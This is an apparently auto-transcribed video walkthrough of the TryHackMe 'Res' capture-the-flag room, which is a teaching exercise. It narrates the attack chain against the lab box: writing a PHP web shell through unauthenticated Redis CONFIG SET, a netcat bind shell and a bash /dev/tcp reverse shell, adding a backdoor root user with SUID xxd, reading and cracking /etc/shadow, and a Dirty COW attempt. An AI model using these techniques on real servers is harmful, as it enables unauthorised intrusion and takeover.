 Hello everyone, my name is John Hammond. Welcome back to their YouTube video and in this video I want to be showcasing the res room from try hack me. It's all about Redis or Redis I don't know how to pronounce that. I don't know how to pronounce anything It says hack into a vulnerable database server with an in-memory data structure in the semi guided challenge This is rated an easy room and I suppose it has some I guess I don't know fundamental stuff to it Especially for the privsk, but I think it is very cool and fun to showcase Redis as something that you could abuse and take advantage of so I've deployed the machine already I have this IP address and I'll copy it if you haven't already deployed the machine You can hit that green button deploy here and then we can start to take a look at the box So I have already filled out all these questions and answers here I will showcase how we get into each of those, but let's dive in so I've got a terminal open here I will ping that box so I can confirm that I can reach it and I can let's make a directory YouTube res to work in You could start some notes. You could make little sublime text I don't know or whatever text editor of choice. You've got to work with and Make a little read me for yourself, but I'm gonna start with an nmap scan I'm gonna use nmap tack SC tack SV tack on nmap initial with this IP address So safe scripts or default scripts and then enumerate versions output to the nmap format in that nmap directory that I just created And I'll save the file as initial and I'm copying and pasting that IP address in there So I could turn on verbose mode hit the V button Realistically, I probably should have included that tack V argument So it's already verbose by default, but we'll see how long this takes and I guess we can start poking around on the box manually while we're waiting so I will access it on a Web browser over here. I'll just see if I can reach it. It looks like there is an HTTP port open or HTTP listening on port 80, right? Okay, we're rolling through and we found port 80 Great, but that has not found anything else seemingly we've only found that port So just to be sure because our default nmap scan will look for only the first common a thousand ports We should also run a tack p-tack and that will include all ports We'll just call that that We probably don't need to do those other enumeration scripts, but I guess maybe that's good to do this again I probably should have included that Tack V flag, but regardless looks like we're scanning with nmap just fine So we know we have port 80 we could start to like do some enumeration on that We could need to it. We could go buster. We could der buster. We could start to try and look at more That might be on that page. I don't have a Nikto have a typo there. Sorry now. Let's see if that will run and I should tee that out to log it So let me tee Nikto dot log There we go just some basic fundamentals see if that finds anything interesting and while we're doing that We could run go buster as well. I do have go buster good. So go buster Der tack you for the URL tack w for the word list Do I actually have a word list in here? I don't think so. What is it in Kali user? share word lists Word lists there is one there. Okay, and let's get Derbusters word list and They have a directory list 2.3 medium, I suppose we can fire that up and see if that gets anything Still waiting for this nmap scan to return it'll probably take a little bit I could be showcasing rust scan and that would likely find it super duper fast Admittedly, I am working within Kali on WSL right now So running rust scan using that docker container with the kind of Windows docker for desktop thing Pacing in the IP address and using it with rust scan. It tends to just kind of die I'm not exactly sure why I'm sure I could be passing other arguments So maybe that'll kind of work better with it if I increase the batch size, but it just doesn't happen So, I don't know. Maybe one of you has a solution better than I do but Doesn't look like there's anything that Nikdos finding doesn't look like there's anything that go buster is finding and Nmap is taking its sweet time. Rust scan just gave up which is fantastic to see. All right We could do some research on Redis while we're waiting If my internet comes to hang out, okay, great Redis Redis is an open-source or BSD license in memory data structure store used at a database cache and message broker Okay, so I actually end up using Redis when I'm setting up CTFD instances when I'm hosting capital flag events We create a Redis server and make sure that okay all of the user sessions are able to be Actually stored and maintained and accessed so Redis is the server that we end up creating for that Typically, we'll end up having an authorization set up or we'll create a password for that Redis server to work on and that might not be the case when we're looking at it in a I don't know hacking lab or hacking environment So if we wanted to go find out the port that it's listening on it says by default The Redis server is configured to run on the default port of six three seven nine You can connect the server locally using remote or remotely using the Redis CLI command line tool And then you'll need to specify a password. Okay. It looks like there are some documentations that showcase that so we could explore that If we'd like to let me shut down Nikdo and Durbuster and then start to kind of tinker I will try and use that Redis CLI command and I need to supply what I actually want to connect to if you don't have Redis CLI installed you might need to go ahead and actually pseudo apt install Redis hyphen tools is the package name that includes that and maybe your shell actually suggested that to you I'm not exactly positive, but it'll just go ahead and type in your password install it and then you are good to go So let me read a CLI and then you'll specify tack H for the host that you want to connect to and I'll grab that IP address One more time so I can connect to it There we go Submit there and now seemingly we are Connected we are on that host and I don't know if we actually have needed to authenticate or not Something that you could do to test is just try and run like ping and if it responds with Pong then okay You are in fact connected to the server totally just fine And we could look up some Redis enumeration techniques or like hacking Redis or exporting Redis and see what we've got here Hactrix puts out a great Resource on this sort of thing. So let me zoom in on that so you can see it basic information We've got the exact same kind of blurb that we saw Online when we were simply googling and we've got that default port We could do automatic enumeration with some n-map scripts So that would probably be good to do especially since we can confirm and now that we know that we actually have a redis server here Our own n-map scan is probably taking a serious amount of time because it's doing all ports You could use a banner grab So you could simply netcat to it to try and get any inch actual information Or we could just connect as we've done with reacli and the installation is just as I discussed First command you could try to use is info it may return output with Information of the redis instance or something like the following is returned So if you see this no-auth authentication required That means that you will need credentials to be able to access the redis server in the instance here Let's try and just go ahead and run that info command and see what we get and we certainly do not have the Wine and complain that we need authorization or authentication. So there's some valuable and juicy info We have the redis server version 6.0.7 So we could copy and paste that and that I know is one of the answers that we need here Scan the machine how many ports are open we saw 80 and we also know that redis is open on 6379 So 2 is the proper answer there Redis is the database management system that's installed as we have discovered What port is a database management system running on 6379 again as we've discovered What's the version of the management system installed on the server? 6.0.7 and that is what we just determined running that Info command so that's all that we really needed to run there to track down that information and Then we need to just compromise the machine. Okay, so let's kind of keep exploring and reading through this pen testing redis documentation There are notes here or at least this these hack tricks right not particularly documentation by default Redis can be accessed without credentials. However, it can be configured to support only a password or username and password We could specify this and read a stock configuration file And maybe at some point we could kind of configure and tinker with that play with it But in this case, we don't have to we will not need to auth or authenticate if you have valid credentials You'll get this positive. Okay response After you've logged in or once you have access you could do more enumeration and just kind of look for stuff You can start enumerating the service of the following commands info which we've already ran Client list which we could explore redis response with connected clients. So let's do client list and Looks like that's my IP address Locally and that's the only thing that's currently connected to it and we could get everything out of the configurations database or config So let's do config get literally everything and now there is a lot of stuff So this returns and outputs and kind of an interesting and peculiar way Well, there will be a variable name on one line and then the value following it So rdb checks on this set to yes Damon eyes is set to no Etc. It's not going to give you like a variable equals value syntax or like a colon to denote it really Readably, you'll just have to kind of take that information with one line following to get the actual value A lot of information here Maybe something that could be particularly interesting for us, especially some stuff that we will get into Next we can discuss but this article again explains more readers commands that we could work with and We also discuss dumping the database inside read us the databases our number is excuse me Our numbers starting from zero. You can find if anyone is using the output of the command info inside the key space chunk Okay, that's particularly interesting, but I'm more concerned with getting remote code execution to compromise the machine Okay, looks like we could potentially get a web shell But you'd have to know the path of the website folder. Well, we do have this Apache Ubuntu default And I wonder if that will tell us By default Ubuntu does not allow access to the web browser to any file a part of those located in var Dub-dub-dub public HTML entries. Okay, the default Ubuntu document root is var dub-dub-dub HTML that's kind of common. That's pretty much what we would expect, but we could see that typically with this Ubuntu default page That's pretty handy. So what we could do is we could connect to Our victim read a server we could set the directory by Modifying config and then setting a file name for it to be stored as if we give it a dot PHP extension Then we could just okay Just set a value seemingly and then go ahead and save and it might dump that file so We could try that let's go ahead and Do some config set dur var dub-dub-dub HTML, right Okay, so that responded positively and then we could config set db file name Test dot PHP maybe right and now let's just set a variable name So test and it doesn't matter because it'll be included in the this dump when we save Everything it's kind of in Redis's memory, right? We could set this to I don't know why my voice went weird there Let's check out PHP info and see if we can actually get PHP code execution for one thing now We've set that variable and we can save it good So let's hop back over to the web page here and try and access test dot PHP Okay, now we have PHP info and we have proof that we can execute PHP Which means that we have server-side code execution. So let's make this a little bit more fun Let's set our database file name to something like shell dot PHP and let's set test to something like system With a variable that we could pass them like a dollar sign get C or something dollar sign underscore get will let us specify an HTTP variable that we've supplied and See we'll just be the variable name that we want to use so now when I run this and I save that We should be able to have shell dot PHP Run anything that we'd like if we pass it in Okay, so right now. I haven't supplied any command. I haven't supplied a C value But if I do with a little question mark and C equals ID ooh, we have Data and a UID and GID output. So it looks like we are running commands, right? we could run like who am I and dir and list or LS and other things so we have code execution now we just kind of want to get a reverse shell back to us so What could we do here? We could use a typical like pentest monkey reverse shell cheat sheet and use like a net cat connection to get back to us Something that we also could do is actually open up a bind shell Depending on what version of net cat we have and actually let's make let's verify. We actually have net cat with a witch and see Okay, we do have a slash bin slash NC seemingly so Could I try and run like NC tack V for the version? Is that a thing tack tack version? No seemingly, okay Let's try to see if it has that old Tacky argument or that tacky flag and parameter where we can specify a command to run as you connect back to it So tacky bin bash and then let's listen so LN VP L for listen And for don't resolve domain names and DNS stuff V for verbose and P for report Let's put it on like quad 8 or whatever now because I see the URL in the webpage still spinning I kind of have the thought that it's actively running that so I could go ahead and connect to it or at least try to right? so let me Move out of this terminal And let's net cat to that IP address. That's 10 10 31 148 I think and it's quad 8 right so I'm seemingly connected and I have command execution right so I can Run things and navigate around the file system. Awesome. Okay. Good win. Good. We got it That's one way of doing it or you could of course do a simple bash shell Interesting thing. Let me let me have that reverse shell the bash reverse shell I'll set up a listener on my attacker machine on quad 9 and let me try to use That bash reverse shell so I finally remembered this I finally memorized it and I want you to try and remember it too bash tack I for interactive redirected to an ampersand, right and then Dev TCP your IP address, so I'm 10 2 to 1 32 and then slash in the port So quad 9 is what I'm listening on and then we had go start from zero, right? And you redirect it to ampersand one zero and one that's kind of how I've started to remember it So now you don't have to look up. Hey, what's that bash syntax for a reverse shell all the time when you run this? You may or may not actually get a shell back The gimmick here is that if it's running in sh or just that regular default flat shell It's not gonna work. It's gonna get some bad file to scripture So that doesn't execute what you could do is you could pass it to another bash command So if in this URL, I included a bash taxi and then included like some quotes to denote this here Now I've got bash running and that might not have ran for me Let me use single quotes here. See if that will behave or I might just have my syntax wrong. Maybe I maybe I lied the entire time let's get the high on coffee reverse shell cheat seat and Verify I could have could very well be wrong. Well, I'm trying to tell you Oh, this is how you remember this thing and I just misremember myself Bash tack I redirected to an ampersand dev TCP attacking IP address zero redirected to and one. So that's totally right Maybe we need slash bin bash Or I need a space following these for some reason and a bash can be super duper finicky Let me verify that my IP address is what I think it is so I will IP AS ton zero and I am ten two two one thirty two listening on quad nine So let's see if that works still nothing. Maybe it's my WSL thing being annoying. I Shouldn't waste my time troubleshooting this when we already have given ourselves code execution previously Doesn't need to be an issue. Maybe if anything you memorize the fact that okay bin bash tack I with that is The way that you you get that what am I missing here? This is blowing my mind. That's the right syntax 10 to 2 132 quad 9 nothing nothing Okay, whatever. Well, we'll edit that apart out. We'll get it in post We'll do that net cat tack e methodology for bin bash and then let's listen on quad 8 and Now that that is running We know we could connect back to it and get code execution Fun thing here is that we could very well connect with phone cat So let me start that one more time and I'm going to hop on over to a different shell in get Move into phone cat and I will get pull To get the current release so because Caleb's doing some crazy work on this right now when we could showcase some of that Let's invoke our virtual environment and then run phone cat and connect to that 1010 13148 is that right 31? I was so close There we go on Quad 8 so now we should be connecting to it great Not in the database, so it'll go ahead and connect to it and that works just fine for us So phone cat will be able to kind of showcase a lot of our enumeration stuff in a very quick and easy way It might take some time So we might fire up another session while we're working here But I'm gonna switch to my local prompt I'm gonna use the new syntax to try and run enumerate And if I tab complete on enumerate you could enumerate gather and just start to look for stuff So phone cat will do its thing. He's essentially running his own version of lin peas But let's go open into another terminal and try and connect back to it I should have started like a reversal while I was doing that, but let's Listen on quad 9 and then just do a regular connection here There we go Or I could very well just do that with another phone cat instance and see if he survives We can clear those old terminals that we don't need anymore It's that phone cat do his thing He might take a little bit because try hack me seems to be slow when I use this on a hack the box It's it's much much faster try hack me. I think it's a little bit. I don't know Interesting thing though because I'm comparing and discussing hack the box in relation to try hack me right now You might have seen this gimmick with a redis technique here on the postman machine and you could use it to okay clobber one of the users Private keys like their SSH private keys So you could SSH in the box and that would give you initial access and that was great And I thought like oh res is gonna be just like that. I could clobber an SSH key But we don't have SSH open on this machine. So that kind of gets in the way Whatever interesting We've got now this web shell kind of a cool new different technique we could use So let's do some manual enumeration. We know we are currently running as dub dub dub data So let's go ahead and cat out. It's that repass word. Ooh, but phone cat has finished. So let's see what he's got for me blah blah blah scrolling through Looks like we have Results here. So we have a mount point. We have some network information. We are running Ubuntu 16.04 ASLR is enabled potentially found some passwords. Although these are just dollar sign twos So that doesn't make a whole lot of sense processes that are running a kernel version and Set you ID binaries. Ooh xxd is owned by root That's peculiar xxd is like a blaring and and blatant GTFO bin. Oh, is it also vulnerable to dirty cow? That'd be fun. We should try and use dirty cow Be a little fun extracurricular at the endless video. Let's try to showcase that GTFO bin gimmick So GTFO bins if you're searching for these xxd is a quick and easy win In this case we actually because it's owned by root. We could probably just get that, you know Let's search for xxd and he can file write and file read so we could just clobber it set repass word and Get another user. So phone cat knows how to do this actually if you try and run Escalate auto it'll just tell you what it could potentially do because it knows Hey, we can read and write with xxd as root We could just go ahead and execute that and then it will try to clobber it set repass word We've been finagling this because I brought it up and it's like it seems to think that it failed when it actually Succeeded and let me see if it shows you here. I'm kind of hoping we could Didn't mean to zoom in on that while it was going But it'll give me like hey error module failed no escalation path found But if I check out it set repass word which we've clobbered. Oh, let's get to a remote prompt We have successfully added a phone cat user with a backdoor password that has user ID 0 and can just be root so I will su to phone cat and Use the phone cat password with the backdoor and now we're root. That's it. Okay done For some reason phone cat doesn't think that it succeeded and we're can still kind of troubleshooting that but literally running it again It'll be like oh, I found your persistence because I already created it and then it'll just give you root so That's neat Moving into root which you can do then you are cat the flag Root text and you win. Okay. That's all you needed to do if you had not done that if you had been able to go into the other user here, which I think was Vianca. Yeah Vianca actually has Permissions to just run pseudo everything. So let me su into Vianca because I can and let's try and pseudo attack L You could don't need her password. Do you need her password? Regardless Let me let me let me not care about that because we've just jumped over user and got into root We could get into her home directory and then cat that flag Cat user dot text. Yep, and you would submit that just fine We could answer those last questions. Oh, what is the local user account? Oh, I follow Yeah, I'm sorry because you had xxd as your privest you could use xxd to read it set reshadow And then you could grab the uncle's hash and then crack it That's kind of nice and easy and we could do that, right? Let's let's try and use some of those gtfo beans manually just so you see actually what's happening File read with xxd if I were Just dub dub dub data again We could xxd Etc reshadow and just simply read it out and then we have Vianca's password So we could crack that with John the Ripper so Let's move over to our same directory where we were we were in YouTube res Let's sub all Shadow dot text or something and just slap it in there and then we should be able to run John. Yep I think of that and then word list Where is Do we even need to specify words? Well John just figured out while John is cranking. Let's Try to see. Oh, yeah, he just grabs his his own User share John is there one for rock you? Oh, yeah, it just Just rips it out. I'm not used to being on Cali. I'll admit man user share Rock you. Yeah, okay. It's there So then you could SU into Vianca Beautiful one and then you could pseudo attack L You Spell that right One I think I still spelled it wrong. Nope. Okay. She can just literally run everything He or she Vianca male or female. I don't know you can pseudo everything. So there's route immediately gimmicks and fun things here though before we start to dive in a turdy cow because you guys like when I Move into stuff that I haven't seen before. There's an interesting gimmick with this file, right an xxd Let's say you are trying to write into Anything how about that? That'll be the name of the file that we want to write to and xxd writes from only the beginning and that's it So let me show you this Let me paste this in and it's going to ruin this prompt. So let me sink and reset Cool If I paste this it still ruins that prompt whatever How about that? Nope Let's get a regular show. Let's do this from home. Who cares Let's uh set L file to anything and then let's try and write echo like 9 9s like 1 2 3 4 5 1 2 3 Into L file. So now I have this anything file But if I were to echo 5 5's 1 2 3 4 5 Cat anything I've added 5 5's and then there's my new line and then there's there's remaining 9's This would probably be a better example with Tech and so we don't have a new line You'll notice that it's not clobbering the original data That's just how it's going to end up doing it Let me all around anything so we can clear it out and get a better visual add in fours and now let's add in just twos and It just starts in the beginning and writes everything that you specify That's good to note is that you if you don't fill up the whole rest of that file buffer Yeah, it'll still linger in there, especially when you use xxd At least with that gtfo bin technique. So good to know. All right We've got root we've showcased some xxd stuff and do we have gcc? We do. All right, let's try in dirty cow. Let's try it dirty cow dot see here's one and That is the One that's I think just tampering a file. I want it. I want fire fart dirty cow Fire for I think it's the Yeah, it's dirty dot see this one here It'll add a whole user for us and it explains how you can compile it nice and easily Let's see if we could write this here Let's just go ahead and Where am I currently In punk hat. Oh, I'm in punk hat. That's annoying. So Let's move into there get Punk hat and Let's just subble a dirty dot see Slap all that in and now let's go ahead and upload that so let's upload dirty dot see There we go and now on my temp directory I have dirty dot see If I cat that out on the victim, we have our dirty cow source code So let's gcc and the syntax they use here is p thread And L crypts are the libraries that we're also going to include so slap that in see if it will compile It should output to dirty. That's completed. Now I have dirty, which is a file on binary I could run So let's make sure that's executable. I think the compiler will already do that Let's try it and see if we don't break this box It's at our password successfully backed up to temp password back under the new password I'll type in anything and let's give it a little bit of time and to see if it actually does complete the dirty cow exploit I know this is a little bit dangerous. It might shake the box up But I want to showcase it. I want to tinker with I want to see if it'll be anything fun I guess I'll pause the recording now and just let this do its thing But I hope you guys have learned some other good nuggets while we've been rolling through it. Thanks. I'll see you soon Okay, I stepped out for a quick little bio break, but it looked like it finished Done check it said we're password to see if the new user was created You could log in with the username fire fart and the password anything which is the one that I typed in there I did not mean to copy that and try to type it. Okay Is fire fart in it said we're password Um seemingly no S you fire fart does he exist? No It's not it's that we're shadow. Is it? Should I dada should shadow No, oh, I need to be root. Well, yeah, okay fine I'm pretty sure dirty cow Is probably not even applicable to 1604 Let's check 30 count ninja You can check out that page and see what he's got here. Oh, no, I don't want these proof of concepts. I want to see the Check if your system is vulnerable You could see the patch kernel versions. Yeah 1604 LTS and that is the kernel version that we saw 404, right? Let's do a you name take a Yeah, I believe okay, maybe 4.40 and then 180 9 so I'm thinking that's past But that was fun. That was a little good little exercise. You guys were probably screaming at me like stop Don't bother John. It's not even vulnerable, but hey, you got to see the compile process and maybe that was a Good little exercise. Okay. That's enough of me talking. This has been a long video But hey, thank you guys so much for watching. I hope you enjoyed I hope you're able to follow along and see all of the little gimmicks and techniques and tricks there But that's how I got those flags here and completed the res room So thanks for hanging out everybody. I hope you enjoy and I'll see you in the next video. I love you